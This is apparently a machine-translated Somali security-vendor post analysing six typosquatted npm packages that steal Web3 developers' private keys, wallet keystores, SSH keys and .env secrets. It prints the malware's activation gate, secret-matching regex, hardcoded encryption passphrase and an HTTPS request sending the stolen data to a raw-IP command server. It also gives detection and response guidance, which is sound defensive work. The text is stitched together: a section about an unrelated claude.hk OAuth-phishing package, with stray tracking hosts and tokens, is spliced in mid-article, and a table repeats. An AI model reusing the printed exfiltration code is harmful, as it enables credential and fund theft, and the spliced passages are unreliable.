Weerarka Typosquatting ee EVMDeFi npm wuxuu xadaa Furaha Horumariyaha

Weerarka EVM/DeFi npm ee loo yaqaan 'Trump squatting' wuxuu xaday Furaha Horumariyaha

TL, DR

Maajo 6, 2026, hal daabace npm ah, namikazesarada010206, waxay riixday lix xirmo oo xaasidnimo ah oo bartilmaameedsanaya nidaamka deegaanka ee horumariyaha Ethereum, Solidity, iyo DeFi.

Xirmooyinka, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, Iyo web3-utils-core, waxay isticmaaleen magacyo macquul ah oo loogu talagalay inay u ekaadaan maktabadaha caawiyaha ee qalabka caanka ah ee Web3.

Lixda baakadoodba waxay ka koobnaayeen isku mid telemetry.js faylka. Faylku wuxuu ahaa mid isku mid ah kooxda oo dhan, iyadoo SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Malware-ku ma shaqeeyo waqtiga rakibidda. Ma jiro wax preinstall or postinstall jillaab. Taa beddelkeeda, way hawlgashaa marka baakadda laga soo dejiyo require().

Faahfaahintaasi waa muhiim.

Qalabka lagu tallaalay wuxuu sugayaa ilaa horumariye uu dhab ahaan isticmaalo xirmada. Kadib wuxuu hubiyaa in goobta shaqadu u eg tahay jawi horumarineed oo Ethereum / Solidity ah oo dhab ah. Waxay raadisaa furayaasha Alchemy ama Infura, furayaasha gaarka ah, mnemonics, furayaasha deployer, ama buugga Foundry ee maxalliga ah.

Haddii martigeliyaha uu la mid noqdo, tuuggu wuxuu ururiyaa furayaasha gaarka loo leeyahay ee SSH, bakhaarada boorsada ee Foundry / Geth / Brownie, .env* faylasha, iyo doorsoomayaasha deegaanka ee xasaasiga ah. Waxay xidhmada ku siraysaa AES-256-GCM iyadoo adeegsanaysa weedh sir ah oo adag oo u soo saarta barta dhammaadka IPv4 C2 oo cayriin ah iyadoo xaqiijinta TLS ay naafo tahay.

Nidaamka Digniinta Hore ee Malware-ka ee Xygeni (MEW) wuxuu xaqiijiyay in dhammaan lixda xirmo ay yihiin kuwo xaasidnimo ah. Xirmada warbixinta ka saarista diiwaanka npm waa la sugayaa.

Kooxda: Lix Xirmo, Hal Daabace

Akoonka daabacaha namikazesarada010206 waxaa lagu xiray cinwaanka Gmail-ka ee aan la xaqiijin namikazesarada010206@gmail.com.

Ololaha ayaa u muuqday mid soo baxay bishii Maajo 6, 2026. Lixda xirmo ayaa loo kala qaybiyay sida 1.0.0, ma lahayn wax ku tiirsanaan ah waqtiga socodsiinta, waxayna soo dirtay saddex fayl oo keliya:

package.json index.js telemetry.js

Waxay sidoo kale ku dhawaaqeen isla kaydka isha:

https://github.com/harunosakura030303-maker/evmchain-config

Saddexdii xirmo ee ugu horreeyay waxaa qabtay iskaan-qaadayaasha MEW markii ugu horreysay ee la daabacay. Saddexdii soo hartayna si xoog leh ayaa loo calaamadeeyay ka dib markii falanqeeyaha dib u eegis ku sameeyay bogga npm ee daabacaha. Mar isku mid ah bayt-ka. telemetry.js waxaa la xaqiijiyay kooxda oo dhan, waxaa loo xiray inay yihiin kuwo xaasidnimo leh iyadoo la raacayo joogtada.

Xidhmada Version npm La daabacay Tigidhka MEW Xukun
viem-core 1.0.0 2026-05-06 01:38:44Z #51049 Xaasidnimo
viem-utils-core 1.0.0 2026-05-06 #51050 Xaasidnimo
hardhat-core-utils 1.0.0 2026-05-06 #51051 Xaasidnimo
evm-utils 1.0.0 2026-05-06 #51069 Xasad, iyadoo la raacayo joogto ahaansho
qalabka wax lagu keydiyo 1.0.0 2026-05-06 #51071 Xasad, iyadoo la raacayo joogto ahaansho
web3-utils-core 1.0.0 2026-05-06 #51070 Xasad, iyadoo la raacayo joogto ahaansho

Istaraatiijiyadda magac-bixinta waa mid toos ah laakiin waxtar leh.

Xirmooyinkani ma iska dhigaan magacyada saxda ah ee kor ku xusan. Taa beddelkeeda, waxay isticmaalaan daba-galayaal "adeeg" oo macquul ah sida -core, -utils, Iyo -utils-coreTaasi waxay ka dhigaysaa inay u ekaadaan maktabado la socda oo horumariye uu filan karo inuu ku arko qalabka Web3 ee u dhow.

Xirmo Xun Bartilmaameed Sharci ah
viem-core viem, macmiil caan ah oo Ethereum TypeScript ah
viem-utils-core viem
hardhat-core-utils hardhat, jawi horumarineed oo wadajir ah oo adag
evm-utils Magaca qalabka EVM ee guud
qalabka wax lagu keydiyo warshad macdan qodis ah, silsilad qalab adag
web3-utils-core web3-utils, caawiyeyaasha Web3.js

Kani waa qaabka "xirmada dheeraadka ah": ma aha "Anigu waxaan ahay xirmada dhabta ah," laakiin "Waxaan u egahay kaaliye macquul ah oo ku saabsan xirmada dhabta ah."

Horumariyayaasha DeFi si dhakhso ah ayay u socdaan, taasi waa ku filan tahay inay abuurto khatar.

Maxaa Dhaca Marka Xirmada La Soo Dejiyo

Silsiladda weerarku waa mid yar, oo ula kac ah, oo diiradda saaraya deegaannada horumarinta crypto-ka.

Ma jiro jillaab rakibid. Taa beddelkeeda, xirmo kasta waxay ku jirtaa index.js taas oo dhoofisa shaqada adag ka dibna soo rogta moduleka telemetry-ga ee xaasidnimada leh.

require('./telemetry').init();

Tani waxay ka dhigan tahay in malware-ku uu shaqeynayo marka ugu horreysa ee la soo dejiyo.

Taasi waxay si hawleed waxtar u leedahay weeraryahannada. Iskaanno badan iyo sanduuqyo ciid ah ayaa diiradda saaraya dhaqanka waqtiga rakibidda. Xirmadan waxay sugeysaa ilaa uu si dhab ah u isticmaalo horumariye, qoraal dhisme, qalab tijaabo ah, ama waddo waqtiga socodsiinta.

Albaabka Dhaqdhaqaaqa: Dabka oo kaliya ayaa ka socda Goobaha Shaqada ee Horumariyaha Web3 ee Dhabta ah

Qaybta ugu muhiimsan ee qalabka la geliyo waa albaabka firfircoonida.

Hubinta malware-ka ee doorsoomayaasha deegaanka ee sida caadiga ah laga helo mashiinnada horumariyaha Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Waxay sidoo kale hubisaa in Foundry u muuqato in la rakibay:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Haddii labada shuruudood midkoodna run ahayn, shaqadu way soo noqonaysaa oo waxba ma qabanayso.

Taasi waxay ka dhigaysaa baakadda mid aamusan jawiga falanqaynta guud. Sanduuq ciid ah oo aan lahayn Foundry, Alchemy keys, Infura keys, private keys, ama mnemonics ayaa laga yaabaa inay u muuqato mid aan dhib lahayn.

Martigeliyaha la midka ah, malware-ku wuxuu sugaa 60 ilaa 90 ilbiriqsi ka hor inta aan la ururin:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Dib u dhacu wuxuu yareeyaa isku xirnaanta cad ee u dhaxaysa soo dejinta iyo sifeynta. .unref() Wicitaanka sidoo kale wuxuu u oggolaanayaa habka martida loo yahay inuu si caadi ah uga baxo haddii xirmada lagu soo dejiyay qoraal muddo gaaban ah.

Tani maaha dhaqan buuq iyo gacan-ku-rimis ah. Waa tuug bartilmaameedsan oo loogu talagalay inuu ka fogaado orodka haddii jawiga horumariyaha uusan u qalmin inuu wax xado.

Waxa uu Xatooyadu Ururiyo

Marka albaabka hawlgelinta uu dhaafo, malware-ku wuxuu ka ururiyaa ilo muhiim u ah horumarinta Web3: furayaasha gaarka ah, bakhaarada furaha boorsada, aqoonsiga dejinta, sirta daruuraha, calaamadaha npm, iyo habaynta mashruuca maxalliga ah.

source Maxaa la Ururiyaa
geedi socodka.env Kala duwanaansho kasta oo iswaafajin kara /TOKEN|SIRSIR|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Faylasha ay ku jiraan PRIVATE KEY ama BEGIN OPENSSH, oo ay ku jiraan macluumaadka faylka oo dhammaystiran
~/.shirkadda alaabta/dukaamada furaha/* Faylasha keydka furaha ee boorsada Foundry
~/.ethereum/keystore/* Faylasha keydka furaha ee boorsada Geth
~/.brownie/xisaabaad/* Faylasha keydka furaha ee boorsada Brownie
${cwd}/.env Faylka oo buuxa
${cwd}/.env.local Faylka oo buuxa
${cwd}/.env.production Faylka oo buuxa
${cwd}/.env.horumarin Faylka oo buuxa
magaca martida () Macluumaadka Martigeliyaha
crypto.randomUUID() Aqoonsiga Dhibanaha/Kalfadhiga
Taariikh.hadda() Shaambadda wakhtiga ururinta
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Calaamadaha ATTA waa:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Ma aanan xaqiijin in telemetry-gu uu ahaa falanqayn uu sameeyay hawlwadeenka ama kanaal lacag lagu sameeyay oo gaar ah. Calaamadaha ATTA waa isku mid labada muunadood ee aan baarnay.

Kooxda B: heibai

claude.hk OAuth Phishing + Afduubka ANTHROPIC_BASE_URL

Muunadda Abriil 1 waa gacanta ugu weyn, ee ololaha hore.

heibai:2.1.88-claude.hk-4 waxaa daabacay wuguoqiangvip28, akoon la sameeyay Juun 7, 2025. Xirmada si cad ayay isu beddeshay iyadoo ka soo horjeeda sharciga 2.1.88 Sii deynta aadanaha.

Kama mashquuliso CA-cert MITM. Taa beddelkeeda, waxay u been sheegaysaa isticmaalaha ku saabsan OAuth endpoint.

Waxyaabaha xaasidnimada leh ee lagu daray isha Claude Code ee la daadiyay waxaa ka mid ah:

source Maxaa la Ururiyaa
geedi socodka.env Kala duwanaansho kasta oo iswaafajin kara /TOKEN|SIRSIR|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Faylasha ay ku jiraan PRIVATE KEY ama BEGIN OPENSSH, oo ay ku jiraan macluumaadka faylka oo dhammaystiran
~/.shirkadda alaabta/dukaamada furaha/* Faylasha keydka furaha ee boorsada Foundry
~/.ethereum/keystore/* Faylasha keydka furaha ee boorsada Geth
~/.brownie/xisaabaad/* Faylasha keydka furaha ee boorsada Brownie
${cwd}/.env Faylka oo buuxa
${cwd}/.env.local Faylka oo buuxa
${cwd}/.env.production Faylka oo buuxa
${cwd}/.env.horumarin Faylka oo buuxa
magaca martida () Macluumaadka Martigeliyaha
crypto.randomUUID() Aqoonsiga Dhibanaha/Kalfadhiga
Taariikh.hadda() Shaambadda wakhtiga ururinta

Liiska bartilmaameedku waa mid aad u gaar ah. Tani maaha xatooyo biraawsar guud ama xoqid aqoonsi oo ballaaran. Waxaa loogu talagalay horumariyeyaasha dhisa, tijaabiya, hawlgaliya, ama ka shaqeeya codsiyada Ethereum.

Ku darista keydka furaha ee Foundry, Geth, iyo Brownie ayaa si gaar ah muhiim u ah. Faylashani waxay matali karaan marin toos ah oo loo helo boorsooyinka ama aqoonsiyada dejinta. Haddii qofka weerarka soo qaaday uu la mideyn karo furaha sirta ah, xusuusta, ama sirta deegaanka, waxay awoodi karaan inay dhaqaajiyaan lacagaha, iska dhigaan kuwa wax soo dejiya, ama ay wax u dhimaan hawlgallada qandaraaska ee caqliga badan.

Sirta Kahor Sifeynta

Malware-ku wuxuu sireeyaa xogta la ururiyay ka hor inta uusan dirin.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Ereyga sirta ah ee adag waa:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Culeyska ugu dambeeya waxaa loo duubay JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Sirta sirta ah kama dhigayso malware-ka mid aad u horumarsan. Si kastaba ha ahaatee, waxay ka dhigaysaa kormeerka shabakadda mid adag. Difaaca daawanaya bixitaanka wuxuu arki doonaa culayska JSON, laakiin ma arki doono furayaasha la xaday, faylasha boorsada, ama .env waxyaabaha ku jira iyada oo aan lahayn erayga sirta ah ee adag iyo macquulka furfurista.

Sifeynta IPv4 C2 aan la garanayn

Waddada sifeynta waa mid adag:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Malware-ku wuxuu xogta u diraa:

https://76.13.37.80:8443/api/v1/telemetry

Laba faahfaahin ayaa soo baxay.

Marka hore, C2 waa cinwaan IPv4 cayriin ah halkii uu ka ahaan lahaa domain. Taasi waxay meesha ka saaraysaa baahida loo qabo diiwaangelinta domainka waxayna ka fogaanaysaa qaar ka mid ah ogaanshaha ku salaysan domainka.

Marka labaad, xaqiijinta TLS waa la joojiyay iyadoo la adeegsanayo:

rejectUnauthorized: false

Taasi waxay u oggolaanaysaa malware-ka inuu aqbalo shahaado kasta, oo ay ku jiraan shahaadooyin is-saxiix ah. Si kale haddii loo dhigo, qofka weerarka geysta wuxuu helaa gaadiid sir ah isagoon u baahnayn shahaado dadweyne oo ansax ah.

Ma jiro maangal dib-u-tijaabin ah iyo marti-geliye dib-u-dhac ah. Khaladaadka si aamusnaan ah ayaa loo liqaa. Tani waxay xirmada ka dhigaysaa mid aamusan haddii C2 uu yahay mid aan la heli karin ama aan la gaari karin.

Waa Maxay Sababta Ololahani Muhiim U Yahay

Baakadaha npm ee xaasidnimada badan ee loogu talagalay horumariyayaashu waxay raadiyaan aqoonsiyo ballaaran: calaamadaha npm, furayaasha AWS, calaamadaha GitHub, ama .npmrc files.

Ololahan ayaa yareynaya bartilmaameedka.

Waxay raadisaa calaamado muujinaya in mashiinku uu ka tirsan yahay horumariyaha Ethereum ama Solidity. Kadibna waxay si sax ah u soo jiidataa hantida muhiimka ah ee deegaankaas: bakhaarada furaha jeebka, furayaasha gaarka ah, xusuusta, furayaasha dejinta, .env faylasha, iyo furayaasha SSH.

Taasi waxay ololaha ka dhigaysaa mid khatar badan u ah kooxaha Web3 marka loo eego tuug npm guud ahaan ah.

Caabuqa guuleysta wuxuu keeni karaa:

  • Boorsada hawlgalka
  • Furaha maamulka qandaraaska ee caqliga leh
  • Furaha bixiyaha RPC
  • Aqoonsiga daalacashada daruuraha
  • calaamadaha daabacaadda npm
  • Helitaanka SSH ee horumariyaha ama kaabayaasha dhismaha
  • Sirta mashruuca lagu kaydiyay .env files
  • Dukaamada furaha boorsada ee Foundry, Geth, ama Brownie

Magacyada xirmada waxay sidoo kale muujinayaan injineernimo bulsho oo cad. Waxay bartilmaameedsadaan nidaamka deegaanka horumariyaha Web3 iyagoo adeegsanaya magacyo qalab oo la yaqaan: viem, hardhat, foundry, evm, Iyo web3.

Jilaagu uma baahna inuu wax u dhimo mashaariicda dhabta ah. Waxay u baahan yihiin oo keliya horumariye si uu u rakibo wax u eg xirmo macquul ah oo la socota.

Tilmaamayaasha Tanaasulka iyo Ogaanshaha

Xirmooyinka iyo Daabacaha
Field Qiimaha
daabacaha npm namikazesarada010206
Iimaylka Daabacaha namikazesarada010206@gmail.com
Iimaylku waa la xaqiijiyay Maya
SCM xaqiijiyay Maya
Dhibcaha Sumcadda 1.0
Baakado viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
versions Dhamaan 1.0.0
Kaydka isha https://github.com/harunosakura030303-maker/evmchain-config
La xaqiijiyay in si xun loo sameeyay Lixda xirmo oo dhan
Network
nooca Qiimaha
C2 dhamaadka barta https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Dekedda C2 8443/tcp
Dhaqanka TLS rejectUnauthorized: been
Qorshaha culayska mushaharka {"v": 2,"iv": "d": "t": }
Faylasha iyo Hashes-ka
nooca Qiimaha
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Qaab-dhismeedka xirmada xirmo.json, index.js, telemetry.js
Tirada faylasha 3
Cabbirka guud ee qiyaasta ah 3.4 KB

Calaamadaha Dhaqdhaqaaqida

Barnaamijkan wuxuu hubiyaa doorsoomayaasha deegaanka:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Waxay sidoo kale hubisaa:

~/.foundry/

Waddooyinka Marti-gelinta ee La Bartilmaameedsaday

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Ururinta Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Qoraallada Ogaanshaha

Dhowr xeer ayaa qabanaya ololahan iyada oo aan loo baahnayn falanqayn dhaqan oo dhammaystiran.

Marka hore, iskaan geli faylasha qufulka si aad u hesho lixda magac ee xirmada xaasidnimada leh:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Qof kasta oo la mid ah package-lock.json, yarn.lock, pnpm-lock.yaml, ama node_modules taariikhda waa in loola dhaqmaa sidii dhacdo halis ah.

Marka labaad, kormeeraha Node.js wuxuu socodsiiyaa akhrinta waddooyinka furaha boorsada:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Tani waa dhaqan dhif ah oo sharci ah oo loogu talagalay baakad loo soo dhoofiyo si loogu tiirsanaado caawiye ahaan. Aad ayay u shaki badan tahay marka ay ku xigto dhaqdhaqaaqa shabakadda dibadda.

Saddexaad, xannib ama digniin ku saabsan xiriirada HTTPS ee:

76.13.37.80:8443

Gaar ahaan marka waddada codsigu tahay:

/api/v1/telemetry

Afaraad, raadi xirmooyinka npm ee isku daraya sifooyinkan:

  • Daabacaha cusub ama sumcadda hooseeya
  • Akoon Gmail ah oo aan la xaqiijin
  • Magaca xirmada ee ku xiga Web3
  • Ma jiraan taariikh kaydin oo macno leh
  • Qaab-dhismeedka baakad yar
  • index.js kaas oo soo raraya faylka telemetry ama caawiye
  • Ma jiraan ku tiirsanaan waqtiga socodsiinta
  • Ururinta isbeddelka deegaanka ee xasaasiga ah
  • Helitaanka furaha boorsada

Qaabkani wuxuu ka faa'iido badan yahay hal IOC sababtoo ah xirmada xigta waxay bedeli kartaa cinwaanka IP-ga laakiin waxay ilaalin kartaa isla macquulka bartilmaameedka.

Liiska Hubinta Jawaabta Tanaasulka

Haddii horumariye uu isticmaalo mid ka mid ah lixda xirmo oo deegaankoodu uu la mid yahay albaabka kicinta, u qaado goobta shaqada mid la jabiyay.

Taas waxaa ka mid ah mashiinno leh Foundry oo la rakibay, furayaasha Alchemy ama Infura ee deegaanka, furayaasha gaarka ah, mnemonics, ama furayaasha deployer.

Jawaabta lagu taliyay:

  • Ka jar martigeliyaha shabakadda.
  • Ilaali node_modules, faylasha qufulka, taariikhda qolofka, iyo diiwaannada khuseeya ee loogu talagalay baaritaanka dambiyada.
  • Ku wareeji furaha furaha SSH kasta oo hoos yimaada ~/.ssh/.
  • Furaha boorsada u wareeji bakhaar kasta oo furaha hoostiisa ah ~/.foundry, ~/.ethereum, Iyo ~/.brownie.
  • Lacagta u wareeji boorsooyinka cusub.
  • Wareeji sir kasta oo ku kaydsan .env* faylasha ku jira kaydka.
  • Wareeji sirta deegaanka ee la jaan qaadaya regex ururinta, oo ay ku jiraan furayaasha AWS, calaamadaha npm, calaamadaha la geliyo, furayaasha API, furayaasha gaarka ah, abuurka, iyo xusuusta.
  • Daruurta baaritaanka, npm, GitHub, bixiyaha RPC, iyo dhaqdhaqaaqa blockchain tan iyo markii ugu horreysay ee xirmada la rakibay.
  • Dib u sawir goobta shaqada ka hor inta aan dib loo isticmaalin.

Waxa ay tahay in Difaacayaashu ay ka qaadaan

Ololahan wuxuu muujinayaa sida qorista npm-ka ay isu beddelayso nidaamyada horumariyeyaasha ee qiimaha sare leh.

Jilaagu uma baahnayn adkeysi. Uma aysan baahnayn wax qariib ah. Xitaa uma aysan baahnayn fulinta waqtiga rakibidda.

Taa beddelkeeda, waxay ku tiirsanaayeen saddex shay:

  • Magacyada xirmooyinka Web3 ee suurtogalka ah
  • Dhaqaajinta oo keliya mashiinnada horumarinta crypto-ga dhabta ah
  • Xatooyada tooska ah ee faylasha iyo siraha ugu muhiimsan horumariyayaasha Ethereum

Taasi waxay ka dhigaysaa ololaha mid si fudud looga maqnaan karo baaritaanka ballaaran iyo mid khatar ah marka uu ku dego jawiga saxda ah.

Kooxaha Web3, casharku waa cad yahay: ula dhaqan magacyada ku tiirsanaanta inay qayb ka yihiin qaabkaaga khatarta ah. Xirmo u eg caawiye aan waxyeello lahayn ayaa weli noqon karta waddada ugu gaaban ee lagu tanaasulo boorsada jeebka.

Waxaa loo soo sheegay diiwaanka npm. Qoraalkan waan cusbooneysiin doonnaa marka akoonka daabacaha iyo xirmooyinka laga saaro.

qalabka-sca-tools-software-ka-samaynta-qalabka-falanqaynta
Mudnaanta sii, hagaaji, oo sug khataraha software-kaaga
Hel Akoonkaaga Bilaashka ah.
Looma baahna kaarka deynta.

Sug Horumarinta Software-kaaga iyo Bixintaada

oo leh Xygeni Product Suite